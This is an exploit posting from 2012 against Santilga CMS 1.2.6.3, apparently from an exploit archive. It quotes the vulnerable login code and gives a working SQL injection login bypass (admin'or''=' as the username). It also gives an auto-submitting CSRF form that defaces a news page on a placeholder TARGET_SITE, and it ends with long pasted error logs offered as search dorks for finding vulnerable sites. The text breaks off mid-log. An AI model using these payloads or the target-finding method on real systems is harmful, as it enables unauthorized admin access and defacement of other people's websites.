Home / exploits Santilga CMS 1.2.6.3 Cross Site Request Forgery / SQL Inject
Posted on 27 May 2012
============================= Vulnerable software: Santilga CMS version 1.2.6.3 $ head -n 10 Admin.php|less <?php /** * DO NOT EDIT THIS FILE! IT WILL BE OVERWRITTEN BY THE GENERATOR! * * @version 1.2.6.3 - generated: 2010-11-06 14:39:32 */ class Admin_Bean_Base extends Santilga_Bean { protected $_primaryKey = 'id'; Vendor: santilga.com ============================ Time to 0day it. ============================ Tested: In Wild :P OS: Windows Server Web Server Xamp edition. And Linux OS. ============================= Vuln Desc Under condition: GPC OFF This cms is commercial and vulnerable to sql injection+CSRF: Due insufficent sanitization of login when passing to mysql query we can trick it) Also if you want to "fingerprint" and make sure is target site really uses santilga use this technique: site.tld/admin/dashboard Doing that you can simply may view administration section. ===================SNIP=========================== $ cat AdminLogin.php|less <?php class AdminLogin_Controller extends Santilga_Controller{ public function __construct() { $this->view->templateName = "admin"; parent::__construct(); $this->lang = Santilga_Language::getInstance()->getLanguage(); $this->view->lang = $this->lang; $this->view->showUploadForm = false; } public function indexAction(){ if($this->helpers->User->adminLoggedIn()){ $this->helpers->Url->redirect("admin/about"); }else{ $this->helpers->Url->redirect("adminLogin/login"); } } public function logoutAction(){ $session = Santilga_Resource::get("session"); if($session->adminLoggedIn){ unset($session->admin); unset($session->adminId); unset($session->adminLoggedIn); } $this->helpers->Url->redirect("adminLogin/login"); } public function loginAction(){ $this->view->layoutFile = "loginLayout.php"; $request = $this->request->getParams(); $session = Santilga_Resource::get("session"); $model = Admin_Model::getInstance(); $error = array(); if($post = $this->request->getPost()){ /*$data = array('username' => $this->request->getPost('username'), 'password' => $this->request->getPost('password') );*/ if(!empty($post["username"]) && !empty($post["password"])){ $admin = $model->autenticate($post); if($admin !== null){ $session->admin = $admin; $session->adminId = $admin->id; $session->adminLoggedIn = true; $this->helpers->Url->redirect("admin/about"); }else{ $error[] = Santilga_Language::_("userPassMismatch", "Error:: username and/or password didn't match or you are not admin"); } }else{ $error[] = Santilga_Language::_("userPassRequired", "Username and password must not be empty"); } } $this->view->error = $error; $this->view->title = Santilga_Language::_("panelLogin", " Panel Login"); $this->view->mainContent = $this->view->content("form", "login"); $this->view->rightBlock = false; } } ?> ================================================================ If simply we will pass ' to login We will get: 27.05.12 11:22:39- Uncaught Santilga_Database_Exception, code: 1064,Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '3590cb8af0bbb9e78c343b52b93773c9'' at line 1,SQL:SELECT `admin`.* FROM admin WHERE username= ''' AND password= '3590cb8af0bbb9e78c343b52b93773c9' #0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '3590cb8af0bbb9e78c343b52b93773c9'' at line 1,SQL:SELECT `admin`.* FROM admin WHERE username= ''' AND password= '3590cb8af0bbb9e78c343b52b93773c9' ,[] => ,[] => 1064,[] Exploiting: site.tld/admin/ Login: admin'or''=' Password: whateveryouwant Logged in:) CSRF: ================================================================== <body onload="javascript:document.forms[0].submit()"> <form enctype="multipart/form-data" action="http://TARGET_SITE/admin/news/edit/id-33" method="post"> <input type="hidden" name="id" value="33" /> <input type="hidden" name="title" id="title" value="<h1>PwnEd</h1>" /> <textarea type="hidden" id="introtext" name="introtext" cols="0" rows="0" > <h1>You Have Been PwnEd</h1> </textarea> <input type="hidden" id="ordering" name="ordering" value="1" size="3" maxlength="5" /> <select type="hidden" name="published"> <option value="1" selected="selected">Yes</option> <option value="0" >No</option> </select> </form> =================================================================== Dork: Google+search for this exceptions: Error!! 22.06.10 07:40:46- WARNING: Invalid argument supplied for foreach() in C:Serverptcapplication emplatesadmineditcategories.php on line 61 <br /><br /> #0 Santilga_Error->ErrorHandler(2, Invalid argument supplied for foreach(), C:Serverptcapplication emplatesadmineditcategories.php, 61, Array ([templateFile] => categories.php,[templateSection] => edit,[render] => )) called at [C:Serverptcapplication emplatesadmineditcategories.php:61]<br />#1 include(C:Serverptcapplication emplatesadmineditcategories.php) called at [C:ServerptclibrariessantilgaviewView.php:43]<br />#2 Santilga_View->renderTemplate(categories, edit, ) called at [C:ServerptclibrariessantilgaviewView.php:138]<br />#3 Santilga_View->content(categories, edit) called at [C:ServerptcapplicationcontrollersAdmin.php:329]<br />#4 Admin_Controller->categoryAddAction() called at [C:ServerptclibrariessantilgacontrollerController.php:131]<br />#5 Santilga_Controller->dispatch() called at [C:ServerptclibrariessantilgaapplicationApplication.php:49]<br />#6 Santilga_Application->run() called at [C:Serverptcpublic_htmlindex.php:37]<br /> Error!! 23.06.10 07:15:04- Uncaught Santilga_Helper_Exception, code: 0,Message: No such helper exist - Recaptcha<br /><br /> #0 Santilga_Error->ExceptionHandler(Santilga_Helper_Exception Object ([] => No such helper exist - Recaptcha,[] => ,[] => 0,[] => C:ServerptclibrariessantilgahelperHelper.php,[] => 19,[] => Array ([0] => Array ([file] => C:ServerptcapplicationcontrollersUser.php,[line] => 107,[function] => __get,[class] => Santilga_Helper,[type] => ->,[args] => Array ([0] => Recaptcha)),[1] => Array ([file] => C:ServerptclibrariessantilgacontrollerController.php,[line] => 131,[function] => registerAction,[class] => User_Controller,[type] => ->,[args] => Array ()),[2] => Array ([file] => C:ServerptclibrariessantilgaapplicationApplication.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:Serverptcpublic_htmlindex.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))<br /> Error!! 23.06.10 07:17:22- WARNING: Missing argument 1 for Recaptcha_Helper::verify(), called in C:ServerptcapplicationcontrollersUser.php on line 56 and defined in C:ServerptcapplicationhelpersRecaptcha.php on line 68 <br /><br /> #0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Recaptcha_Helper::verify(), called in C:ServerptcapplicationcontrollersUser.php on line 56 and defined, C:ServerptcapplicationhelpersRecaptcha.php, 68, Array ()) called at [C:ServerptcapplicationhelpersRecaptcha.php:68]<br />#1 Recaptcha_Helper->verify() called at [C:ServerptcapplicationcontrollersUser.php:56]<br />#2 User_Controller->registerAction() called at [C:ServerptclibrariessantilgacontrollerController.php:131]<br />#3 Santilga_Controller->dispatch() called at [C:ServerptclibrariessantilgaapplicationApplication.php:49]<br />#4 Santilga_Application->run() called at [C:Serverptcpublic_htmlindex.php:37]<br /> Error!! 23.06.10 12:23:55- Uncaught Santilga_Exception, code: 0,Message: Captcha text did not match one on image<br /><br /> #0 Santilga_Error->ExceptionHandler(Santilga_Exception Object ([] => Captcha text did not match one on image,[] => ,[] => 0,[] => C:ServerptcapplicationcontrollersConnect.php,[] => 31,[] => Array ([0] => Array ([file] => C:ServerptclibrariessantilgacontrollerController.php,[line] => 131,[function] => contactAction,[class] => Connect_Controller,[type] => ->,[args] => Array ()),[1] => Array ([file] => C:ServerptclibrariessantilgaapplicationApplication.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[2] => Array ([file] => C:Serverptcpublic_htmlindex.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))<br /> Error!! 24.06.10 11:00:03- WARNING: ob_start() [<a href='ref.outcontrol'>ref.outcontrol</a>]: output handler 'ob_gzhandler' cannot be used twice in C:ServerptclibrariessantilgaerrorError.php on line 156 <br /><br /> #0 Santilga_Error->ErrorHandler(2, ob_start() [<a href='ref.outcontrol'>ref.outcontrol</a>]: output handler 'ob_gzhandler' cannot be used twice, C:ServerptclibrariessantilgaerrorError.php, 156, Array ([exception] => Santilga_Object_Exception Object ([] => No Such Property:title,[] => ,[] => 0,[] => C:ServerptclibrariessantilgaobjectObject.php,[] => 20,[] => Array ([0] => Array ([file] => C:Serverptcapplication emplatesptccontentcategory.php,[line] => 2,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => title)),[1] => Array ([file] => C:ServerptclibrariessantilgaviewView.php,[line] => 43,[args] => Array ([0] => C:Serverptcapplication emplatesptccontentcategory.php),[function] => include),[2] => Array ([file] => C:ServerptclibrariessantilgaviewView.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => category,[1] => content,[2] => )),[3] => Array ([file] => C:ServerptcapplicationcontrollersContent.php,[line] => 38,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => category,[1] => content)),[4] => Array ([file] => C:ServerptclibrariessantilgacontrollerController.php,[line] => 131,[function] => categoryAction,[class] => Content_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:ServerptclibrariessantilgaapplicationApplication.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:Serverptcpublic_htmlindex.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ())))))<br />#1 ob_start(ob_gzhandler) called at [C:ServerptclibrariessantilgaerrorError.php:156]<br />#2 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:title,[] => ,[] => 0,[] => C:ServerptclibrariessantilgaobjectObject.php,[] => 20,[] => Array ([0] => Array ([file] => C:Serverptcapplication emplatesptccontentcategory.php,[line] => 2,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => title)),[1] => Array ([file] => C:ServerptclibrariessantilgaviewView.php,[line] => 43,[args] => Array ([0] => C:Serverptcapplication emplatesptccontentcategory.php),[function] => include),[2] => Array ([file] => C:ServerptclibrariessantilgaviewView.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => category,[1] => content,[2] => )),[3] => Array ([file] => C:ServerptcapplicationcontrollersContent.php,[line] => 38,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => category,[1] => content)),[4] => Array ([file] => C:ServerptclibrariessantilgacontrollerController.php,[line] => 131,[function] => categoryAction,[class] => Content_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:ServerptclibrariessantilgaapplicationApplication.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:Serverptcpublic_htmlindex.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))<br /> Error!! 24.06.10 11:00:59- WARNING: ob_start() [<a href='ref.outcontrol'>ref.outcontrol</a>]: output handler 'ob_gzhandler' cannot be used twice in C:ServerptclibrariessantilgaerrorError.php on line 156 <br /><br /> #0 Santilga_Error->ErrorHandler(2, ob_start() [<a href='ref.outcontrol'>ref.outcontrol</a>]: output handler 'ob_gzhandler' cannot be used twice, C:ServerptclibrariessantilgaerrorError.php, 156, Array ([exception] => Santilga_Object_Exception Object ([] => No Such Property:title,[] => ,[] => 0,[] => C:ServerptclibrariessantilgaobjectObject.php,[] => 20,[] => Array ([0] => Array ([file] => C:Serverptcapplication emplatesptccontentcategory.php,[line] => 2,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => title)),[1] => Array ([file] => C:ServerptclibrariessantilgaviewView.php,[line] => 43,[args] => Array ([0] => C:Serverptcapplication emplatesptccontentcategory.php),[function] => include),[2] => Array ([file] => C:ServerptclibrariessantilgaviewView.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => category,[1] => content,[2] => )),[3] => Array ([file] => C:ServerptcapplicationcontrollersContent.php,[line] => 38,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => category,[1] => content)),[4] => Array ([file] => C:ServerptclibrariessantilgacontrollerController.php,[line] => 131,[function] => categoryAction,[class] => Content_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:ServerptclibrariessantilgaapplicationApplication.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:Serverptcpublic_htmlindex.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ())))))<br />#1 ob_start(ob_gzhandler) called at [C:ServerptclibrariessantilgaerrorError.php:156]<br />#2 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:title,[] => ,[] => 0,[] => C:ServerptclibrariessantilgaobjectObject.php,[] => 20,[] => Array ([0] => Array ([file] => C:Serverptcapplication emplatesptccontentcategory.php,[line] => 2,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => title)),[1] => Array ([file] => C:ServerptclibrariessantilgaviewView.php,[line] => 43,[args] => Array ([0] => C:Serverptcapplication emplatesptccontentcategory.php),[function] => include),[2] => Array ([file] => C:ServerptclibrariessantilgaviewView.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => category,[1] => content,[2] => )),[3] => Array ([file] => C:ServerptcapplicationcontrollersContent.php,[line] => 38,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => category,[1] => content)),[4] => Array ([file] => C:ServerptclibrariessantilgacontrollerController.php,[line] => 131,[function] => categoryAction,[class] => Content_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:ServerptclibrariessantilgaapplicationApplication.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:Serverptcpublic_htmlindex.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))<br /> Error!! 24.06.10 11:01:08- Uncaught Santilga_Object_Exception, code: 0,Message: No Such Property:title<br /><br /> #0 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:title,[] => ,[] => 0,[] => C:ServerptclibrariessantilgaobjectObject.php,[] => 20,[] => Array ([0] => Array ([file] => C:Serverptcapplication emplatesptccontentcategory.php,[line] => 2,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => title)),[1] => Array ([file] => C:ServerptclibrariessantilgaviewView.php,[line] => 43,[args] => Array ([0] => C:Serverptcapplication emplatesptccontentcategory.php),[function] => include),[2] => Array ([file] => C:ServerptclibrariessantilgaviewView.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => category,[1] => content,[2] => )),[3] => Array ([file] => C:ServerptcapplicationcontrollersContent.php,[line] => 38,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => category,[1] => content)),[4] => Array ([file] => C:ServerptclibrariessantilgacontrollerController.php,[line] => 131,[function] => categoryAction,[class] => Content_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:ServerptclibrariessantilgaapplicationApplication.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:Serverptcpublic_htmlindex.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))<br /> Error!! 25.06.10 06:01:03- WARNING: mail() [<a href='function.mail'>function.mail</a>]: Failed to connect to mailserver at "localhost" port 25, verify your "SMTP" and "smtp_port" setting in php.ini or use ini_set() in C:ServerptcapplicationhelpersMail.php on line 105 <br /><br /> #0 Santilga_Error->ErrorHandler(2, mail() [<a href='function.mail'>function.mail</a>]: Failed to connect to mailserver at "localhost" port 25, verify your "SMTP" and "smtp_port" setting in php.ini or use ini_set(), C:ServerptcapplicationhelpersMail.php, 105, Array ([headers] => Content-type: text/html; charset=utf-8 <br />From: ptccloud.com <info@ptccloud.com> <br />Reply-To: ptccloud.com <info@ptccloud.com>))<br />#1 mail(sixth@email.de, Activation Required, To finalize registration please fill in activation code here <br />http://192.168.1.3/ptc/public_html/user/validate<br />activation code is : c55a035cfef9836b747e, Content-type: text/html; charset=utf-8 <br />From: ptccloud.com <info@ptccloud.com> <br />Reply-To: ptccloud.com <info@ptccloud.com>, ) called at [C:ServerptcapplicationhelpersMail.php:105]<br />#2 Mail_Helper->sendMail() called at [C:ServerptcapplicationcontrollersUser.php:314]<br />#3 User_Controller->_sendActivationEmail(sixth@email.de, sixth, c55a035cfef9836b747e) called at [C:ServerptcapplicationcontrollersUser.php:104]<br />#4 User_Controller->registerAction() called at [C:ServerptclibrariessantilgacontrollerController.php:131]<br />#5 Santilga_Controller->dispatch() called at [C:ServerptclibrariessantilgaapplicationApplication.php:49]<br />#6 Santilga_Application->run() called at [C:Serverptcpublic_htmlindex.php:37]<br /> Error!! 25.06.10 07:17:58- WARNING: include(C:Serverptcapplication/templates/ptc/user/account.php) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory in C:ServerptclibrariessantilgaviewView.php on line 43 <br /><br /> #0 Santilga_Error->ErrorHandler(2, include(C:Serverptcapplication/templates/ptc/user/account.php) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory, C:ServerptclibrariessantilgaviewView.php, 43, Array ([templateFile] => account.php,[templateSection] => user,[render] => )) called at [C:ServerptclibrariessantilgaviewView.php:43]<br />#1 Santilga_View::renderTemplate() called at [C:ServerptclibrariessantilgaviewView.php:43]<br />#2 Santilga_View->renderTemplate(account, user, ) called at [C:ServerptclibrariessantilgaviewView.php:138]<br />#3 Santilga_View->content(account, user) called at [C:ServerptcapplicationcontrollersAccount.php:8]<br />#4 Account_Controller->indexAction() called at [C:ServerptclibrariessantilgacontrollerController.php:131]<br />#5 Santilga_Controller->dispatch() called at [C:ServerptclibrariessantilgaapplicationApplication.php:49]<br />#6 Santilga_Application->run() called at [C:Serverptcpublic_htmlindex.php:37]<br /> Error!! 25.06.10 07:48:26- Uncaught Santilga_Database_Exception, code: 1064,Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group WHERE id='1' LIMIT 0,1' at line 1,SQL:SELECT `group`.* FROM group WHERE id='1' LIMIT 0,1<br /><br /> #0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group WHERE id='1' LIMIT 0,1' at line 1,SQL:SELECT `group`.* FROM group WHERE id='1' LIMIT 0,1,[] => ,[] => 1064,[] => C:ServerptclibrariessantilgadatabasedriverMysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:ServerptclibrariessantilgadatabasedriverMysql.php,[line] => 72,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT `group`.* FROM group WHERE id='1' LIMIT 0,1)),[1] => Array ([file] => C:ServerptclibrariessantilgamodelModel.php,[line] => 54,[function] => getResultRow,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT `group`.* FROM group WHERE id='1' LIMIT 0,1)),[2] => Array ([file] => C:ServerptcapplicationhelpersUserstat.php,[line] => 17,[function] => getBean,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => 1)),[3] => Array ([file] => C:ServerptcapplicationcontrollersAccount.php,[line] => 9,[function] => getStats,[class] => Userstat_Helper,[type] => ->,[args] => Array ([0] => 4)),[4] => Array ([file] => C:ServerptclibrariessantilgacontrollerController.php,[line] => 131,[function] => indexAction,[class] => Account_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:ServerptclibrariessantilgaapplicationApplication.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:Serverptcpublic_htmlindex.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))<br /> Error!! 25.06.10 11:24:59- Uncaught Santilga_Database_Exception, code: 1054,Message: Unknown column 'active' in 'where clause',SQL:SELECT `click`.* FROM click WHERE active='1' AND paused='0' AND demographicFilter='NULL' AND clicks > 0 <br /><br /> #0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Unknown column 'active' in 'where clause',SQL:SELECT `click`.* FROM click WHERE active='1' AND paused='0' AND demographicFilter='NULL' AND clicks > 0 ,[] => ,[] => 1054,[] => C:ServerptclibrariessantilgadatabasedriverMysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:ServerptclibrariessantilgadatabasedriverMysql.php,[line] => 91,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT `click`.* FROM click WHERE active='1' AND paused='0' AND demographicFilter='NULL' AND clicks > 0 )),[1] => Array ([file] => C:ServerptclibrariessantilgamodelModel.php,[line] => 180,[function] => getResultList,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT `click`.* FROM click WHERE active='1' AND paused='0' AND demographicFilter='NULL' AND clicks > 0 )),[2] => Array ([file] => C:ServerptcapplicationcontrollersAd.php,[line] => 30,[function] => getBeanList,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([0] => active='1',[1] => paused='0',[2] => demographicFilter='NULL',[3] => clicks > 0),[1] => Array ())),[3] => Array ([file] => C:ServerptclibrariessantilgacontrollerController.php,[line] => 131,[function] => todaysAction,[class] => Ad_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:ServerptclibrariessantilgaapplicationApplication.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:Serverptcpublic_htmlindex.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))<br /> Error!! 25.06.10 13:21:25- Uncaught Santilga_Database_Exception, code: 1265,Message: Data truncated for column 'type' at row 1,SQL:INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 3, 2, 30, 'PENDING', '0,000', '2010-06-25 13:21:25' ) <br /><br /> #0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Data truncated for column 'type' at row 1,SQL:INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 3, 2, 30, 'PENDING', '0,000', '2010-06-25 13:21:25' ) ,[] => ,[] => 1265,[] => C:ServerptclibrariessantilgadatabasedriverMysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:ServerptclibrariessantilgamodelModel.php,[line] => 428,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 3, 2, 30, 'PENDING', '0,000', '2010-06-25 13:21:25' ) )),[1] => Array ([file] => C:ServerptcapplicationcontrollersAd.php,[line] => 122,[function] => insertBean,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([userId] => 3,[adId] => 2,[type] => 30,[status] => PENDING,[moneyEarned] => 0,000,[dateClicked] => 2010-06-25 13:21:25))),[2] => Array ([file] => C:ServerptcapplicationcontrollersAd.php,[line] => 90,[function] => _addPendingClick,[class] => Ad_Controller,[type] => ->,[args] => Array ([0] => 3,[1] => Ad_Bean Object ([] => ad,[] => id,[] => 2,[] => 3,[] => 3,[] => FAP Turbo - The Forex Robot,[] => Double your money every single month! ,[] => ,[] => 30,[] => 200,[] => http://google.com,[] => NULL,[] => 0,[] => 1))),[3] => Array ([file] => C:ServerptclibrariessantilgacontrollerController.php,[line] => 131,[function] => viewAction,[class] => Ad_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:ServerptclibrariessantilgaapplicationApplication.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:Serverptcpublic_htmlindex.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))<br /> Error!! 26.06.10 07:53:21- Uncaught Santilga_Database_Exception, code: 1265,Message: Data truncated for column 'type' at row 1,SQL:INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, 30, 'PENDING', '0,000', '2010-06-26 07:53:21' ) <br /><br /> #0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Data truncated for column 'type' at row 1,SQL:INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, 30, 'PENDING', '0,000', '2010-06-26 07:53:21' ) ,[] => ,[] => 1265,[] => C:ServerptclibrariessantilgadatabasedriverMysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:ServerptclibrariessantilgamodelModel.php,[line] => 428,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, 30, 'PENDING', '0,000', '2010-06-26 07:53:21' ) )),[1] => Array ([file] => C:ServerptcapplicationcontrollersAd.php,[line] => 125,[function] => insertBean,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([userId] => 4,[adId] => 2,[type] => 30,[status] => PENDING,[moneyEarned] => 0,000,[dateClicked] => 2010-06-26 07:53:21))),[2] => Array ([file] => C:ServerptcapplicationcontrollersAd.php,[line] => 92,[function] => _addPendingClick,[class] => Ad_Controller,[type] => ->,[args] => Array ([0] => 4,[1] => Ad_Bean Object ([] => ad,[] => id,[] => 2,[] => 3,[] => 3,[] => FAP Turbo - The Forex Robot,[] => Double your money every single month! ,[] => ,[] => 30,[] => 200,[] => http://google.com,[] => NULL,[] => 0,[] => 1))),[3] => Array ([file] => C:ServerptclibrariessantilgacontrollerController.php,[line] => 131,[function] => viewAction,[class] => Ad_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:ServerptclibrariessantilgaapplicationApplication.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:Serverptcpublic_htmlindex.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))<br /> Error!! 26.06.10 07:54:12- Uncaught Santilga_Database_Exception, code: 1265,Message: Data truncated for column 'type' at row 1,SQL:INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, 30, 'PENDING', '0,000', '2010-06-26 07:54:12' ) <br /><br /> #0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Data truncated for column 'type' at row 1,SQL:INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, 30, 'PENDING', '0,000', '2010-06-26 07:54:12' ) ,[] => ,[] => 1265,[] => C:ServerptclibrariessantilgadatabasedriverMysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:ServerptclibrariessantilgamodelModel.php,[line] => 428,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, 30, 'PENDING', '0,000', '2010-06-26 07:54:12' ) )),[1] => Array ([file] => C:ServerptcapplicationcontrollersAd.php,[line] => 125,[function] => insertBean,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([userId] => 4,[adId] => 2,[type] => 30,[status] => PENDING,[moneyEarned] => 0,000,[dateClicked] => 2010-06-26 07:54:12))),[2] => Array ([file] => C:ServerptcapplicationcontrollersAd.php,[line] => 92,[function] => _addPendingClick,[class] => Ad_Controller,[type] => ->,[args] => Array ([0] => 4,[1] => Ad_Bean Object ([] => ad,[] => id,[] => 2,[] => 3,[] => 3,[] => FAP Turbo - The Forex Robot,[] => Double your money every single month! ,[] => ,[] => 30,[] => 200,[] => http://google.com,[] => NULL,[] => 0,[] => 1))),[3] => Array ([file] => C:ServerptclibrariessantilgacontrollerController.php,[line] => 131,[function] => viewAction,[class] => Ad_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:ServerptclibrariessantilgaapplicationApplication.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:Serverptcpublic_htmlindex.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))<br /> Error!! 26.06.10 07:54:40- Uncaught Santilga_Database_Exception, code: 1265,Message: Data truncated for column 'type' at row 1,SQL:INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, 30, 'PENDING', '0,000', '2010-06-26 07:54:40' ) <br /><br /> #0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Data truncated for column 'type' at row 1,SQL:INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, 30, 'PENDING', '0,000', '2010-06-26 07:54:40' ) ,[] => ,[] => 1265,[] => C:ServerptclibrariessantilgadatabasedriverMysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:ServerptclibrariessantilgamodelModel.php,[line] => 428,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, 30, 'PENDING', '0,000', '2010-06-26 07:54:40' ) )),[1] => Array ([file] => C:ServerptcapplicationcontrollersAd.php,[line] => 125,[function] => insertBean,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([userId] => 4,[adId] => 2,[type] => 30,[status] => PENDING,[moneyEarned] => 0,000,[dateClicked] => 2010-06-26 07:54:40))),[2] => Array ([file] => C:ServerptcapplicationcontrollersAd.php,[line] => 92,[function] => _addPendingClick,[class] => Ad_Controller,[type] => ->,[args] => Array ([0] => 4,[1] => Ad_Bean Object ([] => ad,[] => id,[] => 2,[] => 3,[] => 3,[] => FAP Turbo - The Forex Robot,[] => Double your money every single month! ,[] => ,[] => 30,[] => 200,[] => http://google.com,[] => 